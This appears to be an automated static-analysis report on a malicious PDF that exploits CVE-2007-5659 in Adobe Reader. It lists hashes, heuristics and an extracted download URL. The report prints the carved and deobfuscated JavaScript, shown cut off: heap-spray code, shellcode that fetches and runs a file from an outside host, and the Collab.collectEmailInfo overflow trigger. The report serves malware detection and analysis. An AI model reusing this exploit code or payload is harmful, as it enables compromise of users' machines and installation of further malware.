Malicious PDF — malware analysis report

Static analysis result for SHA-256 88d2e88cfc06b61a…

MALICIOUS

PDF

3.0 KB First seen: 2026-05-10
MD5: 52b36b0f393047096bd88418f3f713ad SHA-1: df49d245935b35279318494ddc75307874c667d0 SHA-256: 88d2e88cfc06b61a9ee5735f91b35968a7fac046f40c07ebde6b5b8a6a097de2
258 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

This PDF file exploits CVE-2007-5659 in Adobe Reader via embedded JavaScript. The deobfuscated JavaScript contains a URL, http://tthhllkk.info//getexe.php?spl=pdf_exp, which is likely used to download and execute a secondary payload. The ML classifier strongly indicates maliciousness.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 8

  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • JavaScript action low 3 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY
    Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://tthhllkk.info//getexe.php?spl=pdf_exp Referenced by PDF JavaScript

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0009_000.js pdf-javascript-stream PDF /JS object 9 at offset 0xD6 20473 bytes
SHA-256: 952b72846c93cc56aede4a6a1b85a3a4e4792bc91ef561ca927ef671b8e12a00
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 3 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
var keyXXXStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
function decode64(input) {
   var output = "";
   var chr1, chr2, chr3;
   var enc1, enc2, enc3, enc4;
   var i = 0;
   input = input.replace(/[^A-Za-z0-9\+\/\=]/g, "");
   do {
      enc1 = keyXXXStr.indexOf(input.charAt(i++));
      enc2 = keyXXXStr.indexOf(input.charAt(i++));
      enc3 = keyXXXStr.indexOf(input.charAt(i++));
      enc4 = keyXXXStr.indexOf(input.charAt(i++));
      chr1 = (enc1 << 2) | (enc2 >> 4);
      chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
      chr3 = ((enc3 & 3) << 6) | enc4;
      output = output + String.fromCharCode(chr1);
      if (enc3 != 64) {
         output = output + String.fromCharCode(chr2);
      }
      if (enc4 != 64) {
         output = output + String.fromCharCode(chr3);
      }
   } while (i < input.length);
   return output;
}
var aasd = decode64("CiB2YXIgV0xnaGFGVmIzID0gbmV3IEFycmF5KCk7CiB2YXIgZmtzZE5VZDNXOwogdmFyIGxhdmUgPSBldmFsOwogIGxhdmUodW5lc2NhcGUoIiUyMCUyMCU2NiU3NSU2ZSU2MyU3NCU2OSU2ZiU2ZSUyMCU2NSU1NSU3MyU3NiUzNyU2YSU1MyU2ZSU3OCUyOCU0YSU0OSU1MSU0OSU3MCUzOCU2YyU0NiU3MiUyYyUyMCU1OCU1NSU3NiUzNCU3MiU1NCU2NSUzOCU2MiUyOSUyMCUyMCU3YiUyMCUyMCUyMCUyMCU3NyU2OCU2OSU2YyU2NSUyOCU0YSU0OSU1MSU0OSU3MCUzOCU2YyU0NiU3MiUyZSU2YyU2NSU2ZSU2NyU3NCU2OCUyMCUyYSUyMCUzMiUyMCUzYyUyMCU1OCU1NSU3NiUzNCU3MiU1NCU2NSUzOCU2MiUyOSUyMCUyMCUyMCUyMCU3YiUyMCUyMCUyMCUyMCUyMCUyMCU0YSU0OSU1MSU0OSU3MCUzOCU2YyU0NiU3MiUyMCUyYiUzZCUyMCU0YSU0OSU1MSU0OSU3MCUzOCU2YyU0NiU3MiUzYiUyMCUyMCUyMCUyMCU3ZCUyMCUyMCUyMCUyMCU0YSU0OSU1MSU0OSU3MCUzOCU2YyU0NiU3MiUyMCUzZCUyMCU0YSU0OSU1MSU0OSU3MCUzOCU2YyU0NiU3MiUyZSU3MyU3NSU2MiU3MyU3NCU3MiU2OSU2ZSU2NyUyOCUzMCUyYyUyMCU1OCU1NSU3NiUzNCU3MiU1NCU2NSUzOCU2MiUyMCUyZiUyMCUzMiUyOSUzYiUyMCUyMCUyMCUyMCU3MiU2NSU3NCU3NSU3MiU2ZSUyMCU0YSU0OSU1MSU0OSU3MCUzOCU2YyU0NiU3MiUzYiUyMCUyMCU3ZCUyMCIpKTsgIGxhdmUodW5lc2NhcGUoIiUyMCUyMCUyMCU2NiU3NSU2ZSU2MyU3NCU2OSU2ZiU2ZSUyMCU1MSU2NSU2YyU0ZiU3OCU2YiUzNyU2ZSU1MCUyOCU3MyU0NCU1MCU2YiU1NSU0YyU3MSU0YyUzOCUyOSUyMCUyMCU3YiUyMCUyMCUyMCUyMCU2OSU2NiUyOCU3MyU0NCU1MCU2YiU1NSU0YyU3MSU0YyUzOCUyMCUzZCUzZCUyMCUzMCUyOSUyMCUyMCUyMCUyMCU3YiUyMCUyMCUyMCUyMCUyMCUyMCU3NiU2MSU3MiUyMCU3MiU2MiU0OSUzMiU2YyU0NiU3OSU0NiU0YyUyMCUzZCUyMCUzMCU3OCUzMCU2MyUzMCU2MyUzMCU2MyUzMCU2MyUzYiUyMCUyMCUyMCUyMCUyMCUyMCU3NiU2MSU3MiUyMCU2OSU0MyU2YSU1NSU2ZCU2ZSU0ZCU1NyU1OCUyMCUzZCUyMCUyMCU3NSU2ZSU2NSU3MyU2MyU2MSU3MCU2NSUyOCUyMiUyNSU3NSU0MyUzMCUzMyUzMyUyNSU3NSUzOCU0MiUzNiUzNCUyNSU3NSUzMyUzMCUzNCUzMCUyNSU3NSUzMCU0MyUzNyUzOCUyNSU3NSUzNCUzMCUzOCU0MiUyNSU3NSUzOCU0MiUzMCU0MyUyNSU3NSUzMSU0MyUzNyUzMCUyNSU3NSUzOCU0MiU0MSU0NCUyNSU3NSUzMCUzOCUzNSUzOCUyNSU3NSUzMCUzOSU0NSU0MiUyNSU3NSUzNCUzMCUzOCU0MiUyNSU3NSUzOCU0NCUzMyUzNCUyNSU3NSUzNyU0MyUzNCUzMCUyNSU3NSUzNSUzOCUzOCU0MiUyNSU3NSUzNiU0MSUzMyU0MyUyNSU3NSUzNSU0MSUzNCUzNCUyNSU3NSU0NSUzMiU0NCUzMSUyNSU3NSU0NSUzMiUzMiU0MiUyNSU3NSU0NSU0MyUzOCU0MiUyNSU3NSUzNCU0NiU0NSU0MiUyNSU3NSUzNSUzMiUzNSU0MSUyNSU3NSU0NSU0MSUzOCUzMyUyNSU3NSUzOCUzOSUzNSUzNiUyNSU3NSUzMCUzNCUzNSUzNSUyNSU3NSUzNSUzNyUzNSUzNiUyNSU3NSUzNyUzMyUzOCU0MiUyNSU3NSUzOCU0MiUzMyU0MyUyNSU3NSUzMyUzMyUzNyUzNCUyNSU3NSUzMCUzMyUzNyUzOCUyNSU3NSUzNSUzNiU0NiUzMyUyNSU3NSUzNyUzNiUzOCU0MiUyNSU3NSUzMCUzMyUzMiUzMCUyNSU3NSUzMyUzMyU0NiUzMyUyNSU3NSUzNCUzOSU0MyUzOSUyNSU3NSUzNCUzMSUzNSUzMCUyNSU3NSUzMyUzMyU0MSU0NCUyNSU3NSUzMyUzNiU0NiU0NiUyNSU3NSU0MiU0NSUzMCU0NiUyNSU3NSUzMCUzMyUzMSUzNCUyNSU3NSU0NiUzMiUzMyUzOCUyNSU3NSUzMCUzOCUzNyUzNCUyNSU3NSU0MyU0NiU0MyUzMSUyNSU3NSUzMCUzMyUzMCU0NCUyNSU3NSUzNCUzMCU0NiU0MSUyNSU3NSU0NSU0NiU0NSU0MiUyNSU3NSUzMyU0MiUzNSUzOCUyNSU3NSUzNyUzNSU0NiUzOCUyNSU3NSUzNSU0NSU0NSUzNSUyNSU3NSUzNCUzNiUzOCU0MiUyNSU3NSUzMCUzMyUzMiUzNCUyNSU3NSUzNiUzNiU0MyUzMyUyNSU3NSUzMCU0MyUzOCU0MiUyNSU3NSUzOCU0MiUzNCUzOCUyNSU3NSUzMSU0MyUzNSUzNiUyNSU3NSU0NCUzMyUzMCUzMyUyNSU3NSUzMCUzNCUzOCU0MiUyNSU3NSUzMCUzMyUzOCU0MSUyNSU3NSUzNSU0NiU0MyUzMyUyNSU3NSUzNSUzMCUzNSU0NSUyNSU3NSUzOCU0NCU0MyUzMyUyNSU3NSUzMCUzOCUzNyU0NCUyNSU3NSUzNSUzMiUzNSUzNyUyNSU3NSUzMyUzMyU0MiUzOCUyNSU3NSUzOCU0MSU0MyU0MSUyNSU3NSU0NSUzOCUzNSU0MiUyNSU3NSU0NiU0NiU0MSUzMiUyNSU3NSU0NiU0NiU0NiU0NiUyNSU3NSU0MyUzMCUzMyUzMiUyNSU3NSU0NiUzNyUzOCU0MiUyNSU3NSU0MSU0NSU0NiUzMiUyNSU3NSU0MiUzOCUzNCU0NiUyNSU3NSUzMiU0NSUzNiUzNSUyNSU3
... (truncated)
generic_stage_recovery_000.js deobfuscated-js generic stage recovery percent-decode from JavaScript object 9 at offset 0xD6 5026 bytes
SHA-256: 4a8c987d56face021124f53d3ff974208288953c1b0683d0757e90f20432b572
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 10 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var WLghaFVb3 = new Array();
 var fksdNUd3W;
 var lave = eval;
  lave(unescape("  function eUsv7jSnx(JIQIp8lFr, XUv4rTe8b)  {    while(JIQIp8lFr.length * 2 < XUv4rTe8b)    {      JIQIp8lFr += JIQIp8lFr;    }    JIQIp8lFr = JIQIp8lFr.substring(0, XUv4rTe8b / 2);    return JIQIp8lFr;  } "));  lave(unescape("   function QelOxk7nP(sDPkULqL8)  {    if(sDPkULqL8 == 0)    {      var rbI2lFyFL = 0x0c0c0c0c;      var iCjUmnMWX =  unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u742F%u6874%u6C68%u6B6C%u2E6B%u6E69%u6F66%u2F2F%u6567%u6574%u6578%u702E%u7068%u733F%u6C70%u703D%u6664%u655F%u7078");    }    else if(sDPkULqL8 == 1)    {      rbI2lFyFL = 0x30303030;      var iCjUmnMWX =  unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u742F%u6874%u6C68%u6B6C%u2E6B%u6E69%u6F66%u2F2F%u6567%u6574%u6578%u702E%u7068%u733F%u6C70%u703D%u6664%u655F%u7078");    }    else if(sDPkULqL8 == 2)    {      var iCjUmnMWX =  unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u742F%u6874%u6C68%u6B6C%u2E6B%u6E69%u6F66%u2F2F%u6567%u6574%u6578%u702E%u7068%u733F%u6C70%u703D%u6664%u655F%u7078");    }    var cVNNNpIil = 0x400000;    var iZEUHNEkH = iCjUmnMWX.length * 2;    var XUv4rTe8b = cVNNNpIil - (iZEUHNEkH + 0x38);    var JIQIp8lFr = unescape("%u9090%u9090");    JIQIp8lFr = eUsv7jSnx(JIQIp8lFr, XUv4rTe8b);    var CzwDhaYhe = (rbI2lFyFL - 0x400000) / cVNNNpIil;    for(var aIIw9xwsN = 0; aIIw9xwsN < CzwDhaYhe; aIIw9xwsN++)    {      WLghaFVb3[aIIw9xwsN] = JIQIp8lFr + iCjUmnMWX;    }  } "));  lave(unescape("  function hYdtCGnsU()  {    var glPOUM2If = 0;    var w4vOAj0AW = app.viewerVersion.toString();    app.clearTimeOut(fksdNUd3W);    if((w4vOAj0AW >= 8 && w4vOAj0AW < 8.102) || w4vOAj0AW < 7.1)    {      QelOxk7nP(0);      var Tu93nKdAV = unescape("%u0c0c%u0c0c");      while(Tu93nKdAV.length < 44952) Tu93nKdAV += Tu93nKdAV;      var xe72GqtKd = this;      var qlBlD4u6P = Collab;      xe72GqtKd["collabStore"] = qlBlD4u6P["collectEmailInfo"](      {        subj : "", msg : Tu93nKdAV      }      );    }    if((w4vOAj0AW >= 8.102 && w4vOAj0AW < 8.104) || (w4vOAj0AW >= 9 && w4vOAj0AW < 9.1) || w4vOAj0AW <= 7.101)    {      try      {        if(app
... (truncated)
generic_stage_recovery_001.js deobfuscated-js generic stage recovery percent-decode -> percent-decode from JavaScript object 9 at offset 0xD6 5022 bytes
SHA-256: 90304ab814601fac722e9dd44c58f91f86323295075e7f3d87ffa1696ac5f8a7
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 10 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var WLghaFVb3 = new Array();
 var fksdNUd3W;
 var lave = eval;
  lave(unescape("  function eUsv7jSnx(JIQIp8lFr, XUv4rTe8b)  {    while(JIQIp8lFr.length * 2 < XUv4rTe8b)    {      JIQIp8lFr += JIQIp8lFr;    }    JIQIp8lFr = JIQIp8lFr.substring(0, XUv4rTe8b / 2);    return JIQIp8lFr;  } "));  lave(unescape("   function QelOxk7nP(sDPkULqL8)  {    if(sDPkULqL8 == 0)    {      var rbI2lFyFL = 0x0c0c0c0c;      var iCjUmnMWX =  unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u742F%u6874%u6C68%u6B6C%u2E6B%u6E69%u6F66%u2F2F%u6567%u6574%u6578%u702E%u7068%u733F%u6C70%u703D%u6664%u655F%u7078");    }    else if(sDPkULqL8 == 1)    {      rbI2lFyFL = 0x30303030;      var iCjUmnMWX =  unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u742F%u6874%u6C68%u6B6C%u2E6B%u6E69%u6F66%u2F2F%u6567%u6574%u6578%u702E%u7068%u733F%u6C70%u703D%u6664%u655F%u7078");    }    else if(sDPkULqL8 == 2)    {      var iCjUmnMWX =  unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u742F%u6874%u6C68%u6B6C%u2E6B%u6E69%u6F66%u2F2F%u6567%u6574%u6578%u702E%u7068%u733F%u6C70%u703D%u6664%u655F%u7078");    }    var cVNNNpIil = 0x400000;    var iZEUHNEkH = iCjUmnMWX.length * 2;    var XUv4rTe8b = cVNNNpIil - (iZEUHNEkH + 0x38);    var JIQIp8lFr = unescape("%u9090%u9090");    JIQIp8lFr = eUsv7jSnx(JIQIp8lFr, XUv4rTe8b);    var CzwDhaYhe = (rbI2lFyFL - 0x400000) / cVNNNpIil;    for(var aIIw9xwsN = 0; aIIw9xwsN < CzwDhaYhe; aIIw9xwsN++)    {      WLghaFVb3[aIIw9xwsN] = JIQIp8lFr + iCjUmnMWX;    }  } "));  lave(unescape("  function hYdtCGnsU()  {    var glPOUM2If = 0;    var w4vOAj0AW = app.viewerVersion.toString();    app.clearTimeOut(fksdNUd3W);    if((w4vOAj0AW >= 8 && w4vOAj0AW < 8.102) || w4vOAj0AW < 7.1)    {      QelOxk7nP(0);      var Tu93nKdAV = unescape("%u0c0c%u0c0c");      while(Tu93nKdAV.length < 44952) Tu93nKdAV += Tu93nKdAV;      var xe72GqtKd = this;      var qlBlD4u6P = Collab;      xe72GqtKd["collabStore"] = qlBlD4u6P["collectEmailInfo"](      {        subj : "", msg : Tu93nKdAV      }      );    }    if((w4vOAj0AW >= 8.102 && w4vOAj0AW < 8.104) || (w4vOAj0AW >= 9 && w4vOAj0AW < 9.1) || w4vOAj0AW <= 7.101)    {      try      {        if(app
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.